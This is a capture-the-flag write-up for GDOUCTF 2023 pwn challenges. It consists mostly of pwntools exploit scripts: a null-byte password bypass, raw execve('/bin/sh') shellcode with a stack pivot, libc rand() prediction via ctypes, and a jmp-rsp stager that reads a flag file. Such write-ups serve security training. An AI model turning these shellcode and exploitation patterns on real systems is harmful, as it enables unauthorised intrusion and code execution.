GDOUCTF2023 wp

EASY PWN：

伪随机
open("/dev/urandom", 0)产生的随机数，比较可以用\x00绕过，爆破即可
exp：

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


while True:
    try:
        # io=process("./easypwn")
        io=remote("node5.anna.nssctf.cn",28637)
        io.recvuntil(b"Password:\n")
        io.sendline(b"\x00")
        io.recvline()
        io.recvline()
        io.interactive()
    except:
        io.close()
        continue

Shellcode：

shellcode模板题
exp：

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


# io=process("./pwn1")
io=remote("node5.anna.nssctf.cn",28533)
leave_ret=0x40074e
ex_addr=0x6010A0
shellcode=b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
# shellcode=asm(shellcraft.sh())
io.recvuntil(b"Please.\n")

# gdb.attach(io)
# pause()

io.send(shellcode)
io.recvuntil(b"Let's start!\n")
payload=cyclic(0x12)+p64(ex_addr)
io.send(payload)
io.interactive()

# Gadgets information
# ============================================================
# 0x000000000040074e : leave ; ret
# 0x000000000040028e : ret

# Unique gadgets found: 2

真男人下120层：

最后一次seed通过gdb动态调试发现在稳定在0xA5462D92左右
使用cdll模拟随机数产生即可
exp：

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])


io=remote("node5.anna.nssctf.cn",28438)
# io=process("./bin")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")						
cs.srand(0xA5462D92)																					

# gdb.attach(io)
# pause()

for i in range(120):
    io.recvuntil(b"\n")
    payload=cs.rand()%4+1
    io.sendline(str(payload))

io.interactive()

RANDOM：

cdll模拟随机数，然后构造read读shellcode，栈可写，并且有haha函数可以jmp_rsp，迁移到栈上写shellcode
此题本地调试卡住，远端通。。。。。

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# io=remote("node1.anna.nssctf.cn",28725)
io=process("./R")
elf=ELF("./R")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

jmp_rsp=0x40094e
sd=cs.time(0)
cs.srand(sd)

io.recvuntil(b"num:\n")
io.sendline(str(cs.rand()%50))
io.recvuntil(b"door\n")

shellcode=asm('''
    xor rax,rax  
    shl rdx,12   #计数器，1<<12->0x40000  nbytes
    mov esi,0x601700  buf=0x601700 
    syscall
    jmp rsi   #迁移到0x601700
''')

gdb.attach(io)
pause()

payload=cyclic(0x28)+p64(jmp_rsp)+shellcode
io.send(payload)
shellcode=asm(shellcraft.open("./flag")+shellcraft.read(3,0x601200,0x50)+shellcraft.write(1,0x601200,0x50))
io.send(shellcode)
io.interactive()